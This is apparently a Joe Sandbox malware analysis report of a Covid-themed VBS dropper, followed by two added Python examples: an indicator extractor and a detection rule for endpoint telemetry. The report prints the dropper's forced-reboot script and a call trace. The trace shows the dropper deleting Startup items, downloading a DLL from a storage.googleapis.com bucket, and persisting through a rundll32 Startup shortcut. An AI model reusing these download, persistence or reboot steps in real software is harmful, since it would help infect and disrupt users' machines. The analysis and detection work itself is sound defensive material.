Analysis Report Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs

Overview

General Information

Sample Name: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs
Analysis ID: 338753
MD5: 462d612fcc6ce92ac4d1b58a27e4ecac
SHA1: 405633f2a4fe5b859ea9331a2276ebd494d39aa4
SHA256: 2bedcf94c9aea7b126f70169728f38678d615cdc26991c3b30628912eb2766d9

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Detected VMProtect packer
Machine Learning detection for dropped file
Potential evasive VBS script found (sleep loop)
Potential malicious VBS script found (has network functionality)
Windows Shell Script Host drops VBS files
Contains capabilities to detect virtual machines
Creates a start menu entry (Start Menu\Programs\Startup)
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Stores files to the Windows start menu directory

Classification

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll Avira: detection malicious, Label: TR/Black.Gen2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\P-16-5[1].dll Avira: detection malicious, Label: TR/Black.Gen2
Multi AV Scanner detection for submitted file
Source: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs Virustotal: Detection: 25%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\P-16-5[1].dll Joe Sandbox ML: detected

Networking:

Potential malicious VBS script found (has network functionality)
Source: Initial file: .write ZXDFVHIJXTXNZLNYYGEJOJNR.responseBody
Source: Initial file: .savetofile LJETZISNBGIJOFCVGWUIZSLT, 2
Source: Initial file: .write BFLCAJXFUHBOZFMBDCLJVIWJ.responseBody
Source: Initial file: .savetofile SASLHXXIDQYMUYFJXVRVATCD, 2
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 8.8.8.8
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GOOGLEUS
Source: wscript.exe, 00000001.00000002.1051218798.0000022DE835A000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: wscript.exe, 00000001.00000002.1048503032.0000022DE626D000.00000004.00000020.sdmp String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp String found in binary or memory: https://pki.goog/repository/0
Source: wscript.exe, 00000001.00000002.1051098917.0000022DE824B000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/
Source: wscript.exe, 00000001.00000002.1051098917.0000022DE824B000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/kqKv)
Source: wscript.exe, 00000001.00000002.1050701507.0000022DE8060000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.1051196571.0000022DE8348000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zip
Source: wscript.exe, 00000001.00000002.1048655023.0000022DE632E000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zip_)ik$
Source: wscript.exe, 00000001.00000002.1051196571.0000022DE8348000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zipjysv
Source: wscript.exe, 00000001.00000002.1050701507.0000022DE8060000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.1051196571.0000022DE8348000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dll
Source: wscript.exe, 00000001.00000002.1048655023.0000022DE632E000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dll/
Source: wscript.exe, 00000001.00000002.1048655023.0000022DE632E000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dllenu

System Summary:

Detected VMProtect packer
Source: P-16-5[1].dll.1.dr Static PE information: .vmp0 and .vmp1 section names
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\P-16-5[1].dll E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651
Java / VBScript file with very long strings (likely obfuscated code)
Source: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs Initial sample: Strings found which are bigger than 50
PE file contains more sections than normal
Source: P-16-5[1].dll.1.dr Static PE information: Number of sections : 12 > 10
Source: classification engine Classification label: mal100.evad.winVBS@1/6@0/2
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\eycptlzztfs.vbs
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs'
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (Software Restriction Policies lookup performed by the script host)
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs Virustotal: Detection: 25%
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 (CLSID of the VBScript script engine)

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface (buffer reflowed, one statement or call per line):
  Script text seen by AMSI (tail of the second-stage script the dropper writes to disk):
    WScript.Shell")
    WScript.Sleep(300000)
    Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _
      & "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_
      & "Primary=true")
    for each OpSys in OpSysSet
      retVal = OpSys.Win32Shutdown(6)
    next
  COM call trace of the initial script:
    IHost.CreateObject("Wscript.Shell")
    IWshShell3.SpecialFolders("AppData")
    IFileSystem3.CreateTextFile("C:\Users\user\AppData\Roaming\eycptlzztfs.vbs", "true")
    ITextStream.Write("Set SFHISGAPSMULDDGFLMFHDFTG = CreateObject("WScript.Shell")")
    ITextStream.Write("WScript.Sleep(300000)")
    ITextStream.Write("Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _")
    ITextStream.Write("& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_")
    ITextStream.Write("& "Primary=true")")
    ITextStream.Write("for each OpSys in OpSysSet")
    ITextStream.Write("retVal = OpSys.Win32Shutdown(6)")
    ITextStream.Write("next")
    ITextStream.Close()
    IWshShell3.SpecialFolders("StartUp")
    IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk", "true")
    IWshShell3.SpecialFolders("StartUp")
    IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs", "true")
    IWshShell3.SpecialFolders("AppData")
    IFileSystem3.CreateFolder("C:\Users\user\AppData\Roaming\24145662426947")
    IWshShell3.SpecialFolders("AppData")
    IWshShell3.SpecialFolders("AppData")
    IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/0.zip", "false")
    IServerXMLHTTPRequest2.send()
    _Stream.Type("1")
    _Stream.Open()
    IServerXMLHTTPRequest2.responseBody()
    _Stream.Write("Unsupported parameter type 00002011")
    _Stream.SaveToFile("C:\Users\user\AppData\Roaming\0.zip", "2")
    IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/P-16-5.dll", "false")
    IServerXMLHTTPRequest2.send()
    _Stream.Type("1")
    _Stream.Open()
    IServerXMLHTTPRequest2.responseBody()
    _Stream.Write("Unsupported parameter type 00002011")
    _Stream.SaveToFile("C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll", "2")
    IHost.CreateObject("Wscript.Shell")
    IWshShell3.SpecialFolders("StartUp")
    IHost.CreateObject("WScript.Shell")
    IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gjnpswnghs .lnk")
    IWshShortcut.TargetPath("rundll32")
    IWshShortcut.Arguments(" C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll SFsb9V5o7LTfxDWhDoh")
    IWshShortcut.WindowStyle("1")
    IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gjnpswnghs")
    IWshShortcut.Save()
    IFileSystem3.OpenTextFile("C:\Users\user\AppData\Roaming\eycptlzztfs.vbs")
    ITextStream.ReadAll()
    ITextStream.Close()
    IHost.Sleep("300000")
    ISWbemServicesEx.ExecQuery("select * from Win32_OperatingSystem where Primary=true")
    ISWbemObjectSet._NewEnum()
    ISWbemObjectEx._01000001("6")
  Reading of the trace: the script (1) writes a second-stage VBS to %APPDATA%\eycptlzztfs.vbs, (2) deletes every existing *.lnk and *.vbs in the user's Startup folder, (3) fetches 0.zip and P-16-5.dll from storage.googleapis.com with MSXML ServerXMLHTTP (synchronous GET, third argument "false") and writes them to disk through ADODB.Stream (Type 1 = binary; "Unsupported parameter type 00002011" is the tracer's rendering of the VT_ARRAY|VT_UI1 byte array returned by responseBody, not an error), (4) persists with a Startup shortcut whose target is rundll32 and whose argument is the renamed DLL followed by an export name (SFsb9V5o7LTfxDWhDoh), and (5) reads the second-stage file back and then performs the same sequence itself: a 300000 ms (5 minute) sleep, a WMI query for the primary Win32_OperatingSystem instance and a method call with argument 6, which matches the Win32Shutdown(6) in the script text (flags 2 Reboot | 4 Force, i.e. a forced reboot). The downloaded DLL is only loaded by the Startup shortcut after that reboot, which is why the sandbox reports it as a dropped PE file that was never started.
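The trace above is dense, and the same calls recur across samples of this dropper family. The following script, an added example and not part of the Joe Sandbox report, walks such a call trace and pulls out the indicators an analyst needs (download URLs, dropped and deleted files, the Startup shortcut, sleep durations, Win32Shutdown flags) and then names the behaviours they add up to. AMSI_TRACE is a constructed excerpt: the calls are copied from the report, with the repetitive SpecialFolders and Stream setup calls left out; the mapping of the dispatch-id method on ISWbemObjectEx to Win32Shutdown is an assumption based on the script text written just before it.

```python
"""Pull indicators out of a Joe Sandbox style AMSI call trace of a VBS dropper.

Added example, not part of the report. AMSI_TRACE is a constructed excerpt of
the trace quoted above (calls copied verbatim, setup calls omitted).
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed excerpt of the AMSI call trace from the report, one call per line.
AMSI_TRACE = r'''
IHost.CreateObject("Wscript.Shell");
IFileSystem3.CreateTextFile("C:\Users\user\AppData\Roaming\eycptlzztfs.vbs", "true");
ITextStream.Write("WScript.Sleep(300000)");
ITextStream.Write("retVal = OpSys.Win32Shutdown(6)");
IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk", "true");
IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs", "true");
IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/0.zip", "false");
_Stream.SaveToFile("C:\Users\user\AppData\Roaming\0.zip", "2");
IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/P-16-5.dll", "false");
_Stream.SaveToFile("C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll", "2");
IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gjnpswnghs .lnk");
IWshShortcut.TargetPath("rundll32");
IWshShortcut.Arguments(" C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll SFsb9V5o7LTfxDWhDoh");
IWshShortcut.Save();
IHost.Sleep("300000");
ISWbemObjectEx._01000001("6")
'''

# Win32_OperatingSystem.Win32Shutdown flag bits (a flag word of 0 means Logoff).
SHUTDOWN_FLAGS = {1: "Shutdown", 2: "Reboot", 4: "Force", 8: "PowerOff"}

CALL_RE = re.compile(r"(\w+)\.(\w+)\((.*)\);?$")   # Interface.Method(args);
QUOTED_RE = re.compile(r'"([^"]*)"')                # one quoted argument


def decode_win32shutdown(flags: int) -> list[str]:
    """Expand a Win32Shutdown flag word, e.g. 6 -> ['Reboot', 'Force']."""
    if flags == 0:
        return ["Logoff"]
    return [name for bit, name in SHUTDOWN_FLAGS.items() if flags & bit]


@dataclass
class DropperIOCs:
    urls: list[str] = field(default_factory=list)       # remote payloads fetched
    dropped: list[str] = field(default_factory=list)    # files written to disk
    deleted: list[str] = field(default_factory=list)    # competing autostarts removed
    shortcut: dict[str, str] = field(default_factory=dict)
    sleeps_ms: list[int] = field(default_factory=list)
    shutdown_flags: list[int] = field(default_factory=list)


def _first_arg(args: str) -> str:
    m = QUOTED_RE.search(args)
    return m.group(1) if m else args


def parse_trace(trace: str) -> DropperIOCs:
    """Walk the trace line by line and collect the indicators that matter."""
    iocs = DropperIOCs()
    for raw in trace.strip().splitlines():
        m = CALL_RE.match(raw.strip())
        if not m:
            continue
        iface, method, args = m.groups()
        if iface == "IServerXMLHTTPRequest2" and method == "open":
            iocs.urls.append(QUOTED_RE.findall(args)[1])           # ("GET", url, async)
        elif method in ("SaveToFile", "CreateTextFile"):
            iocs.dropped.append(_first_arg(args))
        elif method == "DeleteFile":
            iocs.deleted.append(_first_arg(args))
        elif iface == "IWshShell3" and method == "CreateShortcut":
            iocs.shortcut["path"] = _first_arg(args)
        elif iface == "IWshShortcut" and method in ("TargetPath", "Arguments"):
            iocs.shortcut[method.lower()] = _first_arg(args).strip()
        elif iface == "IHost" and method == "Sleep":
            iocs.sleeps_ms.append(int(_first_arg(args)))
        elif method == "Write":                                    # script text being dropped
            for sl in re.findall(r"WScript\.Sleep\((\d+)\)", args):
                iocs.sleeps_ms.append(int(sl))
            for sd in re.findall(r"Win32Shutdown\((\d+)\)", args):
                iocs.shutdown_flags.append(int(sd))
        elif iface == "ISWbemObjectEx":
            # Method named only by dispatch id in the trace; assumed (not proven by
            # the trace itself) to be the Win32Shutdown call the script text announces.
            iocs.shutdown_flags.append(int(_first_arg(args)))
    return iocs


def findings(iocs: DropperIOCs) -> list[str]:
    """Turn raw indicators into the behaviours an analyst would flag."""
    out: list[str] = []
    sc = iocs.shortcut
    if "\\startup\\" in sc.get("path", "").lower():
        out.append("startup_lnk_created")
        if (sc.get("targetpath", "").lower().startswith("rundll32")
                and "\\appdata\\" in sc.get("arguments", "").lower()):
            out.append("rundll32_appdata_dll_persistence")
    if iocs.urls and any(p.lower().endswith(".dll") for p in iocs.dropped):
        out.append("remote_dll_download")
    if any(ms >= 120_000 for ms in iocs.sleeps_ms):
        out.append("long_sleep_evasion")
    if any("Reboot" in decode_win32shutdown(f) for f in iocs.shutdown_flags):
        out.append("forced_reboot_after_persistence")
    return out


if __name__ == "__main__":
    result = parse_trace(AMSI_TRACE)
    print(result)
    print(findings(result))
```

Running it against the excerpt yields both storage.googleapis.com URLs, three written files, the rundll32 shortcut with its export-name argument, two 300000 ms sleeps and two Win32Shutdown(6) calls, which findings() reports as Startup persistence, remote DLL download, long-sleep evasion and a forced reboot after persistence.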
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .vmp1
PE file contains sections with non-standard names
Source: P-16-5[1].dll.1.dr Static PE information: section name: .didata
Source: P-16-5[1].dll.1.dr Static PE information: section name: .vmp0
Source: P-16-5[1].dll.1.dr Static PE information: section name: .vmp1

Persistence and Installation Behavior:

Windows Shell Script Host drops VBS files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\eycptlzztfs.vbs
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\P-16-5[1].dll
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll

Boot Survival:

Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gjnpswnghs .lnk
Stores files to the Windows start menu directory
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gjnpswnghs .lnk
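The persistence mechanism documented in this section (a script host writing a .lnk into the user's Startup folder whose target is rundll32 with a DLL under AppData) is easy to hunt for in endpoint telemetry. The following detection logic is an added example, not part of the Joe Sandbox report: it applies two rules to Sysmon-style records and correlates them, so that a DLL written by a script host and later executed by rundll32 is reported as the complete chain rather than as two unrelated hits. EVENTS is constructed telemetry, not data from the sandbox run: the malicious paths and the export name come from the report, while the host name, timestamps, the vendor installer and the benign rundll32 line are made up for contrast.

```python
"""Detect the Startup-.lnk + rundll32 persistence chain in endpoint telemetry.

Added example, not part of the Joe Sandbox report. EVENTS are constructed
Sysmon-style records (Event ID 11 FileCreate, Event ID 1 ProcessCreate);
only the malicious paths and the export name are taken from the report.
"""
from __future__ import annotations

import re

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
AUTOSTART_EXTS = (".lnk", ".vbs", ".js", ".hta", ".cmd", ".bat")
STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\", re.I)
# rundll32 <dll under a profile AppData directory> <export>: the payload is loaded
# from a user-writable location, exactly what the dropped shortcut does.
RUNDLL_PROFILE_RE = re.compile(r'^rundll32(\.exe)?\s+"?([^"]*\\appdata\\[^"]*\.dll)"?[\s,]+\S+', re.I)

# Constructed telemetry (host, timestamps, benign entries are invented).
EVENTS = [
    {"id": 11, "ts": "2021-01-12T10:00:01", "host": "ws01", "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll"},
    {"id": 11, "ts": "2021-01-12T10:00:02", "host": "ws01", "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gjnpswnghs .lnk"},
    {"id": 11, "ts": "2021-01-12T10:00:03", "host": "ws01", "image": r"C:\Program Files\Vendor\setup.exe",
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Vendor Agent.lnk"},
    # Startup items are launched by explorer.exe at the next logon, i.e. after the forced reboot.
    {"id": 1, "ts": "2021-01-12T10:06:30", "host": "ws01", "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32 C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll SFsb9V5o7LTfxDWhDoh"},
    {"id": 1, "ts": "2021-01-12T10:07:00", "host": "ws01", "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]


def rule_startup_drop_by_script_host(ev: dict) -> bool:
    """A script host writes an autostart file into a Startup folder."""
    return (ev["id"] == 11
            and ev["image"].lower().endswith(SCRIPT_HOSTS)
            and STARTUP_RE.search(ev["target"]) is not None
            and ev["target"].lower().endswith(AUTOSTART_EXTS))


def rule_rundll32_profile_dll(ev: dict) -> bool:
    """rundll32 executes an export of a DLL that lives under AppData."""
    return (ev["id"] == 1
            and ev["image"].lower().endswith("rundll32.exe")
            and RUNDLL_PROFILE_RE.match(ev["cmdline"].strip()) is not None)


def detect(events: list[dict]) -> list[tuple[str, str, str]]:
    """Run both rules in time order and correlate them: a DLL written by a
    script host that rundll32 later loads is reported as the full chain."""
    alerts: list[tuple[str, str, str]] = []
    script_dropped_dlls: set[str] = set()
    for ev in sorted(events, key=lambda e: e["ts"]):
        if rule_startup_drop_by_script_host(ev):
            alerts.append(("startup_drop_by_script_host", ev["ts"], ev["target"]))
        if (ev["id"] == 11 and ev["image"].lower().endswith(SCRIPT_HOSTS)
                and ev["target"].lower().endswith(".dll")):
            script_dropped_dlls.add(ev["target"].lower())
        if rule_rundll32_profile_dll(ev):
            dll = RUNDLL_PROFILE_RE.match(ev["cmdline"].strip()).group(2).lower()
            name = ("script_dropped_dll_executed_via_rundll32"
                    if dll in script_dropped_dlls else "rundll32_profile_dll")
            alerts.append((name, ev["ts"], dll))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(*alert)
```

On the constructed events this produces two alerts: the .lnk written by wscript.exe into Startup, and the rundll32 launch of the DLL that wscript.exe had written a few minutes earlier, reported as the correlated chain. The vendor installer's shortcut and the shell32.dll control-panel invocation are not flagged, which is the false-positive budget a rule like this has to respect before it goes into production.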

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Potential evasive VBS script found (sleep loop)
Source: Initial file: CRZSCDGSMROZDYBDQERIQAJU.Write "WScript.Sleep(300000)" & vbCrLf
Source: C:\Windows\System32\wscript.exe Dropped file: WScript.Sleep(300000)
Note: 300000 ms is 5 minutes, a delay that commonly outlasts an automated analysis run; in both the initial script and the dropped eycptlzztfs.vbs the sleep is immediately followed by Win32Shutdown(6) (Reboot | Force), so the payload DLL is only executed by the Startup shortcut after the machine restarts.
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\P-16-5[1].dll
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll
Source: wscript.exe, 00000001.00000002.1051098917.0000022DE824B000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW67
Source: wscript.exe, 00000001.00000002.1051409845.0000022DE8A10000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000001.00000002.1051409845.0000022DE8A10000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000001.00000002.1051409845.0000022DE8A10000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000001.00000002.1051409845.0000022DE8A10000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: P-16-5[1].dll.1.dr
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 108.177.119.128 187
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Behavior Graph (rendered as text): ID 338753, Sample: Covid19-Min-Saude-Comuinica..., Startdate: 12/01/2021, Architecture: WINDOWS, Score: 100
  Top-level signatures: Antivirus detection for dropped file; Multi AV Scanner detection for submitted file; Detected VMProtect packer; 3 other signatures
  Process wscript.exe (started):
    contacts 108.177.119.128 (GOOGLEUS, United States) and 8.8.8.8 (GOOGLEUS, United States)
    drops C:\...\uzunfcmnagjwjpnim5415442287920.dll (PE32), C:\Users\user\AppData\Local\...\P-16-5[1].dll (PE32), C:\Users\user\AppData\...\eycptlzztfs.vbs (ASCII) and 2 other malicious files
    signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; VBScript performs obfuscated calls to suspicious functions; 2 other signatures

Contacted Public IPs

IP               Domain   Country        ASN    ASN Name  Malicious
8.8.8.8          unknown  United States  15169  GOOGLEUS  false
108.177.119.128  unknown  United States  15169  GOOGLEUS  true